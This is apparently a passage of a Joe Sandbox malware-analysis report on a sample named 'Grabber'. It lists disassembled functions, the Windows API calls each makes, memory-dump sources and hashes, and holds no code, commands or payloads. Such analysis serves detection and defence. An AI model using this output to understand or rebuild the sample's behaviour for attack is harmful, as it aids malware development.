                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113847704.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113861201.0000000000419000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Grabber.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: InfoNativeSystem
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1721193555-0
                                                                                                                                                                                                                          • Opcode ID: f8bc963d6c34cd4fcee6a9003d89fae8e3dd4710dd3c612eeb78866044324f60
                                                                                                                                                                                                                          • Instruction ID: e96e1892c4c724b03879bd5233d00e0abab71770c233aa8573b83279bd435b66
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f8bc963d6c34cd4fcee6a9003d89fae8e3dd4710dd3c612eeb78866044324f60
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E6D0126081824986D750BE65850979BB3ECE700304F60883AD085561C1F7BCE9D99657
                                                                                                                                                                                                                          Function 00409BA0 Relevance: 1.5, APIs: 1, Instructions: 10memoryCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • RtlAllocateHeap.NTDLL(00000008,00000000,00402F00,00000200,00000000,0000000A,00000000,00000000,00000000,00000000,00000000,00000000,0040439A,00000000,00000000,00000000), ref: 00409BB1
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2113814027.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113799571.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113831938.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113847704.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113861201.0000000000419000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Grabber.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: AllocateHeap
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1279760036-0
                                                                                                                                                                                                                          • Opcode ID: a9125dc5e6675f3a5c8ff565d637a643d225863b8cf5efdab1d921be1d17f71e
                                                                                                                                                                                                                          • Instruction ID: 6d87291edcf2eeb8e990bf82b01346f6326b2aefffcea0088477b931f0527044
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a9125dc5e6675f3a5c8ff565d637a643d225863b8cf5efdab1d921be1d17f71e
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6EC04C717441007AD6509B24AE49F5776E9BB70702F00C4357545D15F5DB70EC50D768
                                                                                                                                                                                                                          Function 0040D2C4 Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • TlsFree.KERNELBASE(004011D8,004011AA,00000000,00418048,00000000,00000000,00000004,00000000,00417070,00000008,0000000C,000186A1,00000007,00417080,00418098,00000004), ref: 0040D2E1
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2113814027.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113799571.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113831938.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113847704.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113861201.0000000000419000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Grabber.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Free
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3978063606-0
                                                                                                                                                                                                                          • Opcode ID: afb8170c881060827f7b708402de6715e31012ce767a183e2a7e5af61eff3ca6
                                                                                                                                                                                                                          • Instruction ID: 02f19102e46f6fc925772832a959dff7ad61b801f58b10c94ac68856fb14f403
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: afb8170c881060827f7b708402de6715e31012ce767a183e2a7e5af61eff3ca6
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 04C04C30405100DBDF268B44ED0C7D53671A784305F4484BD9002112F1CB7C459CDA5C
                                                                                                                                                                                                                          Function 00409B40 Relevance: 1.5, APIs: 1, Instructions: 6memoryCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • HeapCreate.KERNELBASE(00000000,00001000,00000000,0040106C,00000000,00001000,00000000,00000000), ref: 00409B49
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2113814027.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113799571.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113831938.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113847704.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113861201.0000000000419000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Grabber.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CreateHeap
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 10892065-0
                                                                                                                                                                                                                          • Opcode ID: 9eba7de511a5334458af75c1b88753425be16814361ea3c54108f6a3be7bfcb4
                                                                                                                                                                                                                          • Instruction ID: 1bee1f37f93e9d35684b03c2e4756e6010034fad4ed660fefd81427f3766245b
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9eba7de511a5334458af75c1b88753425be16814361ea3c54108f6a3be7bfcb4
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2AB012702C43005AF2500B105C46B8039609304B43F304024B2015A1D4CBF0108045AC
                                                                                                                                                                                                                          Function 00409B30 Relevance: 1.5, APIs: 1, Instructions: 3memoryCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • HeapDestroy.KERNELBASE(004011DD,004011AA,00000000,00418048,00000000,00000000,00000004,00000000,00417070,00000008,0000000C,000186A1,00000007,00417080,00418098,00000004), ref: 00409B36
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2113814027.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113799571.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113831938.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113847704.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113861201.0000000000419000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Grabber.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: DestroyHeap
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2435110975-0
                                                                                                                                                                                                                          • Opcode ID: 9f5e47457f218c908017f92e5e7370515ba6a022eaaca9f0545f96318fbd8d58
                                                                                                                                                                                                                          • Instruction ID: ab699811fd0d87702ef007ec9d9e0afa2980276031b74f33cf565c9ea9518c6e
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9f5e47457f218c908017f92e5e7370515ba6a022eaaca9f0545f96318fbd8d58
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 98900230404000CBCF015B10ED484843E71F74130532091749015414B0CB314451DA48

                                                                                                                                                                                                                          Non-executed Functions

                                                                                                                                                                                                                          Function 004026B8 Relevance: 4.5, APIs: 3, Instructions: 25COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 0040DFC0: TlsGetValue.KERNEL32(0000000D,?,00402F4D,00000000,00000000,00000000,00000000,?,0040117C,00000000,00000000,00000004,00000000,00417070,00000008,0000000C), ref: 0040DFD7
                                                                                                                                                                                                                          • LoadResource.KERNEL32(00000000,00000000,00000000,00000000,00402EE4,00000000,00000000,0000000A,00000000,00000000,00000000,00000000,00000000,00000000,0040439A,00000000), ref: 004026C9
                                                                                                                                                                                                                          • SizeofResource.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00402EE4,00000000,00000000,0000000A,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004026D9
                                                                                                                                                                                                                            • Part of subcall function 00409BA0: RtlAllocateHeap.NTDLL(00000008,00000000,00402F00,00000200,00000000,0000000A,00000000,00000000,00000000,00000000,00000000,00000000,0040439A,00000000,00000000,00000000), ref: 00409BB1
                                                                                                                                                                                                                            • Part of subcall function 00409C80: memcpy.MSVCRT(?,00000000,00000000,?,?,00402705,02199F70,02199F70,00000000,00000000,00000000,00000000,00000000,00000000,00402EE4,00000000), ref: 00409C90
                                                                                                                                                                                                                          • FreeResource.KERNEL32(?,02199F70,02199F70,00000000,00000000,00000000,00000000,00000000,00000000,00402EE4,00000000,00000000,0000000A,00000000,00000000,00000000), ref: 00402708
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2113814027.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113799571.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113831938.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113847704.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113861201.0000000000419000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Grabber.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Resource$AllocateFreeHeapLoadSizeofValuememcpy
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 4216414443-0
                                                                                                                                                                                                                          • Opcode ID: fe55d16754670a1ac2242d55fbe1307306c78159f7c22dacc8df33dc46889b7d
                                                                                                                                                                                                                          • Instruction ID: a74944ffd3112f9905740440eb7f37d3abcacb2d1106573319e1e0e6d7d597bb
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fe55d16754670a1ac2242d55fbe1307306c78159f7c22dacc8df33dc46889b7d
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 13F07471818305AFDB01AF61DD0196EBEA2FB98304F01883EF484611B1DB769828AB5A
                                                                                                                                                                                                                          Function 00408F69 Relevance: 65.0, APIs: 32, Strings: 5, Instructions: 270windowregistrymemoryCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 00408E58: wcslen.MSVCRT ref: 00408E64
                                                                                                                                                                                                                            • Part of subcall function 00408E58: HeapAlloc.KERNEL32(00000000,00000000,?,00408F81,?), ref: 00408E7A
                                                                                                                                                                                                                            • Part of subcall function 00408E58: wcscpy.MSVCRT ref: 00408E8B
                                                                                                                                                                                                                          • GetStockObject.GDI32(00000011), ref: 00408FB2
                                                                                                                                                                                                                          • LoadIconW.USER32 ref: 00408FE9
                                                                                                                                                                                                                          • LoadCursorW.USER32(00000000,00007F00), ref: 00408FF9
                                                                                                                                                                                                                          • RegisterClassExW.USER32 ref: 00409021
                                                                                                                                                                                                                          • IsWindowEnabled.USER32(00000000), ref: 00409048
                                                                                                                                                                                                                          • EnableWindow.USER32(00000000), ref: 00409059
                                                                                                                                                                                                                          • GetSystemMetrics.USER32(00000001), ref: 00409091
                                                                                                                                                                                                                          • GetSystemMetrics.USER32(00000000), ref: 0040909E
                                                                                                                                                                                                                          • CreateWindowExW.USER32(00000000,00000000,10C80000,-00000096,?,?,?,?,?), ref: 004090BF
                                                                                                                                                                                                                          • SetWindowLongW.USER32(00000000,000000EB,?), ref: 004090D3
                                                                                                                                                                                                                          • CreateWindowExW.USER32(00000000,STATIC,?,5000000B,0000000A,0000000A,00000118,00000016,00000000,00000000,00000000), ref: 00409101
                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000030,00000001), ref: 00409119
                                                                                                                                                                                                                          • CreateWindowExW.USER32(00000200,EDIT,00000000,00000000,0000000A,00000020,00000113,00000015,00000000,0000000A,00000000), ref: 00409157
                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000030,00000001), ref: 00409169
                                                                                                                                                                                                                          • SetFocus.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00409171
                                                                                                                                                                                                                          • SendMessageW.USER32(0000000C,00000000,00000000), ref: 00409186
                                                                                                                                                                                                                          • wcslen.MSVCRT ref: 00409189
                                                                                                                                                                                                                          • wcslen.MSVCRT ref: 00409191
                                                                                                                                                                                                                          • SendMessageW.USER32(000000B1,00000000,00000000), ref: 004091A3
                                                                                                                                                                                                                          • CreateWindowExW.USER32(00000000,BUTTON,00413080,50010001,0000006E,00000043,00000050,00000019,00000000,000003E8,00000000), ref: 004091CD
                                                                                                                                                                                                                          • SendMessageW.USER32(00000000,00000030,00000001), ref: 004091DF
                                                                                                                                                                                                                          • CreateAcceleratorTableW.USER32(?,00000002,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00409216
                                                                                                                                                                                                                          • SetForegroundWindow.USER32(00000000), ref: 0040921F
                                                                                                                                                                                                                          • BringWindowToTop.USER32(00000000), ref: 00409226
                                                                                                                                                                                                                          • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00409239
                                                                                                                                                                                                                          • TranslateAcceleratorW.USER32(00000000,00000000,?), ref: 0040924A
                                                                                                                                                                                                                          • TranslateMessage.USER32(?), ref: 00409259
                                                                                                                                                                                                                          • DispatchMessageW.USER32(?), ref: 00409264
                                                                                                                                                                                                                          • DestroyAcceleratorTable.USER32(00000000), ref: 00409278
                                                                                                                                                                                                                          • wcslen.MSVCRT ref: 00409289
                                                                                                                                                                                                                          • wcscpy.MSVCRT ref: 004092A1
                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004092B4
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2113814027.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113799571.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113831938.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113847704.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113861201.0000000000419000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Grabber.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Window$Message$CreateSend$wcslen$Accelerator$HeapLoadMetricsSystemTableTranslatewcscpy$AllocBringClassCursorDestroyDispatchEnableEnabledFocusForegroundFreeIconLongObjectRegisterStock
                                                                                                                                                                                                                          • String ID: 0$BUTTON$D0A$EDIT$STATIC
                                                                                                                                                                                                                          • API String ID: 54849019-2968808370
                                                                                                                                                                                                                          • Opcode ID: d18335faca37df58a642912671a5e6e9ed3b5d57d2cc689f0dbf3b56ae086657
                                                                                                                                                                                                                          • Instruction ID: 83f6c24ff00e7acae504a8cc9f4403d446bfccf5cce4438541287e2077ea33a9
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d18335faca37df58a642912671a5e6e9ed3b5d57d2cc689f0dbf3b56ae086657
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4E91A070648304BFE7219F64DC49F9B7FA9FB48B50F00893EF644A61E1CBB988448B59
                                                                                                                                                                                                                          Function 00401500 Relevance: 26.6, APIs: 1, Strings: 14, Instructions: 335fileCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • WriteFile.KERNEL32(?,00000000,?,?,00000000,?), ref: 00401637
                                                                                                                                                                                                                            • Part of subcall function 0040DE80: GetLastError.KERNEL32(00001000,00000000,00000000), ref: 0040DE86
                                                                                                                                                                                                                            • Part of subcall function 0040DE80: TlsGetValue.KERNEL32(0000000D), ref: 0040DE95
                                                                                                                                                                                                                            • Part of subcall function 0040DE80: SetLastError.KERNEL32(?), ref: 0040DEAB
                                                                                                                                                                                                                            • Part of subcall function 004057F0: wcsncmp.MSVCRT ref: 00405853
                                                                                                                                                                                                                            • Part of subcall function 004057F0: memmove.MSVCRT(00000000,00000000,?,00000000,00000000,?,?,-0000012C,?,?,004022A6,00000000,00000002,00000000,00000000,00417024), ref: 004058E1
                                                                                                                                                                                                                            • Part of subcall function 004057F0: wcsncpy.MSVCRT ref: 004058F9
                                                                                                                                                                                                                            • Part of subcall function 0040DEC0: TlsGetValue.KERNEL32(0000000D,00000000,00000000), ref: 0040DECC
                                                                                                                                                                                                                            • Part of subcall function 0040DEC0: RtlAllocateHeap.NTDLL(02190000,00000000,?), ref: 0040DEF9
                                                                                                                                                                                                                            • Part of subcall function 0040DEC0: RtlReAllocateHeap.NTDLL(02190000,00000000,?,?), ref: 0040DF1C
                                                                                                                                                                                                                            • Part of subcall function 0040A6C5: wcsncpy.MSVCRT ref: 0040A6E3
                                                                                                                                                                                                                            • Part of subcall function 0040A6C5: wcslen.MSVCRT ref: 0040A6F5
                                                                                                                                                                                                                            • Part of subcall function 0040A6C5: CreateDirectoryW.KERNELBASE(?,00000000), ref: 0040A735
                                                                                                                                                                                                                            • Part of subcall function 0040E020: wcslen.MSVCRT ref: 0040E037
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2113814027.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113799571.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113831938.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113847704.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113861201.0000000000419000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Grabber.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: AllocateErrorHeapLastValuewcslenwcsncpy$CreateDirectoryFileWritememmovewcsncmp
                                                                                                                                                                                                                          • String ID: $pA$&pA$.pA$2pA$2pA$2pA$6pA$6pA$6pA$fpA$fpA$fpA$fpA$fpA
                                                                                                                                                                                                                          • API String ID: 1295435411-3159487945
                                                                                                                                                                                                                          • Opcode ID: d3a3a63bc2a0b99ba5975a07e2b9f90fb8c3599d1eca8c8031e60196fdd81d10
                                                                                                                                                                                                                          • Instruction ID: b4e4a0b709d291d116e2253cfe1eb4aef96e8d0e4325569d50da54c09323f468
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d3a3a63bc2a0b99ba5975a07e2b9f90fb8c3599d1eca8c8031e60196fdd81d10
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E3B134B1504300AED600BBA1DD81E7F77A9EB88308F108D3FF544B61A2CA3DDD59966D
                                                                                                                                                                                                                          Function 00409355 Relevance: 26.4, APIs: 10, Strings: 5, Instructions: 116libraryloaderCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • CoInitialize.OLE32(00000000), ref: 00409373
                                                                                                                                                                                                                            • Part of subcall function 0040E3F0: TlsGetValue.KERNEL32(0000000D,\\?\,?,004096ED,00000104,?,?,?,00401BC5,00000000,00000000,00000000,00000002,00000000,00000000,00000000), ref: 0040E3FA
                                                                                                                                                                                                                          • memset.MSVCRT ref: 00409381
                                                                                                                                                                                                                          • LoadLibraryW.KERNEL32(SHELL32.DLL,?,?,0000000A), ref: 0040938E
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,SHBrowseForFolderW), ref: 004093B0
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,SHGetPathFromIDListW), ref: 004093BC
                                                                                                                                                                                                                          • wcsncpy.MSVCRT ref: 004093DD
                                                                                                                                                                                                                          • wcslen.MSVCRT ref: 004093F1
                                                                                                                                                                                                                          • CoTaskMemFree.OLE32(?), ref: 0040947A
                                                                                                                                                                                                                          • wcslen.MSVCRT ref: 00409481
                                                                                                                                                                                                                          • FreeLibrary.KERNEL32(00000000,00000000), ref: 004094A0
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2113814027.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113799571.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113831938.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113847704.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113861201.0000000000419000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Grabber.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: AddressFreeLibraryProcwcslen$InitializeLoadTaskValuememsetwcsncpy
                                                                                                                                                                                                                          • String ID: $0A$P$SHBrowseForFolderW$SHELL32.DLL$SHGetPathFromIDListW
                                                                                                                                                                                                                          • API String ID: 4193992262-92458654
                                                                                                                                                                                                                          • Opcode ID: 0c1c89229e1b22e48d7f066479dda1c34872fd3251ec2b755b1888499f20ca0d
                                                                                                                                                                                                                          • Instruction ID: 23f57ca1c929181bfbc58391faabb4ebc57556df945843c0c8e437b0019b5ca4
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0c1c89229e1b22e48d7f066479dda1c34872fd3251ec2b755b1888499f20ca0d
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D3416471508704AAC720EF759C49A9FBBE8EF88714F004C3FF945E3292D77899458B6A
                                                                                                                                                                                                                          Function 00406310 Relevance: 21.3, APIs: 9, Strings: 3, Instructions: 275COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • wcsncpy.MSVCRT ref: 00406405
                                                                                                                                                                                                                            • Part of subcall function 0040E1E0: TlsGetValue.KERNEL32(0000000D,?,?,00405EC5,00001000,00001000,?,?,00001000,00402FE6,00000000,00000008,00000001,00000000,00000000,00000000), ref: 0040E1EA
                                                                                                                                                                                                                          • _wcsdup.MSVCRT ref: 0040644E
                                                                                                                                                                                                                          • _wcsdup.MSVCRT ref: 00406469
                                                                                                                                                                                                                          • _wcsdup.MSVCRT ref: 0040648C
                                                                                                                                                                                                                          • wcsncpy.MSVCRT ref: 00406578
                                                                                                                                                                                                                          • free.MSVCRT ref: 004065DC
                                                                                                                                                                                                                          • free.MSVCRT ref: 004065EF
                                                                                                                                                                                                                          • free.MSVCRT ref: 00406602
                                                                                                                                                                                                                          • wcsncpy.MSVCRT ref: 0040662E
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2113814027.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113799571.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113831938.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113847704.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113861201.0000000000419000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Grabber.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: _wcsdupfreewcsncpy$Value
                                                                                                                                                                                                                          • String ID: $0A$$0A$$0A
                                                                                                                                                                                                                          • API String ID: 1554701960-360074770
                                                                                                                                                                                                                          • Opcode ID: a2ec9853b1f56fd283991c6130850b28c29d3bdb2ca3b3670bd4453c3ae5a324
                                                                                                                                                                                                                          • Instruction ID: a3954b37eea6ac6c251c7ba509b6f2d99b081bbe67bc4aeebc7e0be9c04ba548
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a2ec9853b1f56fd283991c6130850b28c29d3bdb2ca3b3670bd4453c3ae5a324
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 30A1BD715043019BCB209F18C881A2BB7F1EF94348F49093EF88667391E77AD965CB9A
                                                                                                                                                                                                                          Function 0040A83A Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 91libraryloaderCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 0040E260: TlsGetValue.KERNEL32(0000000D,00001000,00000000,00000000), ref: 0040E26C
                                                                                                                                                                                                                            • Part of subcall function 0040E260: HeapReAlloc.KERNEL32(02190000,00000000,?,?), ref: 0040E2C7
                                                                                                                                                                                                                          • LoadLibraryW.KERNEL32(Shell32.DLL,00000104,?,?,?,?,00000009,00403791,00000001,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0040A863
                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath), ref: 0040A875
                                                                                                                                                                                                                          • wcscpy.MSVCRT ref: 0040A89B
                                                                                                                                                                                                                          • wcscat.MSVCRT ref: 0040A8A6
                                                                                                                                                                                                                          • wcslen.MSVCRT ref: 0040A8AC
                                                                                                                                                                                                                          • CoTaskMemFree.OLE32(?,00000000,00000000,?,02199F70,00000000,00000000), ref: 0040A8BA
                                                                                                                                                                                                                          • FreeLibrary.KERNEL32(00000000,?,?,?,00000009,00403791,00000001,00000000,00000000,00000000,?,00000000,00000000,00000000,004046B8,00000000), ref: 0040A8C1
                                                                                                                                                                                                                          • wcscat.MSVCRT ref: 0040A8D9
                                                                                                                                                                                                                          • wcslen.MSVCRT ref: 0040A8DF
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2113814027.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113799571.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113831938.0000000000413000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113847704.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2113861201.0000000000419000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Grabber.jbxd
                                                                                                                                                                                                                          Similarity
